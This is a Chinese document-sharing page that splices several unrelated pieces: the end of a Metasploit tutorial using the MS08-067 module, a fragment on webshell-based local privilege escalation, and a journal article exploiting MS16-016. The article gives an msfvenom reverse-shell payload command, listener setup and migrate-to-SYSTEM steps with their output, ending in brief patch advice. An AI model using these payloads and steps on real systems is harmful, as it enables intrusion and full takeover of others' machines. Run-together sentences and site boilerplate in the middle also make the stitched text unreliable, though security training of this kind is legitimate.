这将更新Metasploit的模块和资源。

3. 漏洞:使用"search"命令可以Metasploit框架中的漏洞模块。

例如,输入"search windows"将显示与Windows系统相关的漏洞模块。

4. 选择漏洞模块:使用"use"命令可以选择要使用的漏洞模块。

例如,输入"use exploit/windows/smb/ms08_067_netapi"将选择MS08-067漏洞模块。

5. 设置目标主机:使用"set"命令可以设置目标主机的IP地址或域名。

例如,输入"set RHOST 192.168.0.1"将设置目标主机的IP地址为192.168.0.16. 设置监听主机:使用"set"命令可以设置监听主机的IP地址。

例如,输入"set LHOST 192.168.0.2"将设置监听主机的IP地址为192.168.0.27. 运行攻击:使用"exploit"命令可以运行攻击。

例如,输入"exploit"将开始运行所选的漏洞模块对目标主机进行攻击。

8. 使用Meterpreter会话:如果攻击成功,将建立一个Meterpreter会话。

可以使用一系列的命令和模块来在目标系统上执行各种操作。

本地溢出提权

本地溢出提权

本地溢出提权0x00 前言0x01 找可写目录0x02 运行exploit提权0x03 附录0x00 前言溢出漏洞就像杯子里装水,水多了杯子装不进去,就会把里面的水溢出来.而相对计算机来说计算机有个地方叫缓存区,程序的缓存区长度是被事先设定好的,如果用户输入的数据超过了这个缓存区的长度,那么这个程序就会溢出了.缓存区溢出漏洞主要是由于许多软件没有对缓存区检查而造成的.这一章大概就是说利用一些现成的造成溢出漏洞的exploit通过运行,把用户从users组或其它系统用户中提升到administrators组.首先asp webshell要支持wscript(wscript.shell/shell.application)一般翻开webshell里面都会有组件支持,看到wscript.shell 旁边的勾选上了就支持wscript,当然也有一些webshell会有诈胡的现象.- -市面上的几款比拟火的webshell貌似都有这些问题,帮朋友提权他的webshell有wscript.shell 支持,然后找个目录执行cmd的结果不行,转到我那webshell上显示没wscript.shell 支持..或者aspx能调用.net组件来执行cmd的命令.这里主要用几款市面上比拟多人利用的windows exploit提权的利用工具.0x01 找可写目录这里附上啊D写的asp版本扫描可写目录和欧欧写的aspx扫可写目录,最后附上一款我自己比拟喜欢用来日星外时候的辅助小手冰凉的aspx 通过查注册表然后获取路径,配合啊D 的扫可写目录比拟不错.这些工具我们都演示一遍吧.输入目录,然后点击开始检测,得出以下结果蓝色是貌似是代表有一定的权限,未必可写(可能可读),红色是代表文件夹可写,红色的文件呢就是代表那个文件可写了,黑色是代表不存在该文件夹.接下来演示一下欧欧写的aspx扫描,比拟简单,一看就清楚了..输入文件夹路径或者盘符0.0,接着点击ScanWrtieable即可.最后是演示一下小手冰凉写的这款通过读取注册表里的软件的路径,然后输出注册表里的数据,显示软件安装所在的路径..配合啊D的目录读写检测asp版,可以快速的找到可写目录。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

基于Metasploit的MS16-016本地溢出漏洞利用实战
作者:赵秋
来源:《电脑知识与技术》2018年第31期
摘要:该文对MS16-016本地溢出漏洞做了简单介绍,文中分析了利用MS16-016本地溢出漏洞,渗透到Windows 7中并获取系统权限的实现方式,最后给出了对应的防范措施。

关键词: Metasploit;MS16-016;本地溢出漏洞
中图分类号:TP393; ; ; 文献标识码:A; ; ; 文章编号:1009-3044(2018)31-0216-01
1 漏洞介绍
MS16-016这个漏洞是由于Windows中的WebDAV未正确处理WebDAV客户端发送的信息导致的。

若要利用此漏洞,攻击者首先必须登录系统。

然后,攻击者可以运行一个为利用此漏洞而经特殊设计的应用程序,从而控制受影响的系统。

此漏洞存在于在:Windows Vista SP2、Windows Server 2008 x86 & x64、Windows Server 2008 R2 x64、Windows 7 x86 & x64、Windows 8.1 x86 & x64。

系统中提升权限至系统权限,以下系统中导致系统拒绝服务(蓝屏):Windows Server 2012、Windows Server 2012 R2、Windows RT 8.1、Windows 10。

2 MS16-016本地溢出漏洞利用的实现
下面介绍在Kali中渗透Windows 7 x86的实现。

Kali的IP地址为10.3.81.106,Windows 7 x86的IP地址为10.3.81.152,使用虚拟机kali 中的Metasploit利用MS16-016本地溢出漏洞对Windows 7的进行渗透,从而获得系统权限。

1)在Kali上生成连接软件msf.exe,LHOST为Kali的IP地址
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=10.3.81.106 LPORT=4444 -f exe > msf.exe
2)在命令行下输入“msfconsole”,进入MSF的启动界面
root@kali:~# msfconsole
3)在Metasploit命令提示符下,使用use命令载入监听模块。

设置payload为
windows/meterpreter/reverse_tcp。

设置本地监听主机IP地址为Kali的IP。

可以使用show options查看相关参数,输入exploit命令开始监听。

4)将软件msf.exe发给Windows 7上运行,此时kali上会有连接提示,可以看见MSF弹回了一个session 1(会话连接)。

接着,在Meterpreter Shell中利用getuid命令查看已获得的权限为user权限。

我们要把它提升到system权限,即Windows最高权限。

5)输入命令background,把当前的metasploit shell转为后台执行。

选择MS16-016这个漏洞在进行提权,同时设置刚才连接的ID为1。

最后,执行exploit命令进行提权,可以看到成功的把漏洞利用到了PID为2872的进程中。

6)虽然提权成功了,但连接到的ID为1的会话连接中,执行getuid命令还是看见的是user权限。

msf exploit(windows/local/ms16_016_webdav) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: cmx-PC\cmx
7)使用migrate 命令,迁移到该进程ID中。

meterpreter > migrate 2872
[*] Migrating from 4068 to 2872...
[*] Migration completed successfully.
8)然后执行getuid命令再次查看权限,可以看到已经是系统权限了,输入shell测试。

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 608 created.
Channel 1 created.
Microsoft Windows [版本 6.1.7601]
版权所有(c) 2009 Microsoft Corporation。

保留所有权利。

C:\Users\cmx\Desktop>
3 MS16-016本地溢出漏洞的防御
你也可以通过 Windows 更新获取此更新程序。

在你开启自动更新后,系统会自动下载并安装此更新程序。

https:///zh-cn/security-updates/Securitybulletins/2016/ms16-016用户可从此获取独立的更新程序包。

此安全更新程序通过更正WebDAV验证输入的方式来修复这个漏洞。

参考文献:
[1] 祝烈煌,张子剑.网络攻防实战研究漏洞利用与提权[M].北京:电子工业出版社,2018.
[2][英]Nipun Jaswal,李华峰.精通Metasploit渗透测试[M]. 2版.北京:人民邮电出版社,2017.
[3] http:///vuls/95950.html.。

相关文档
最新文档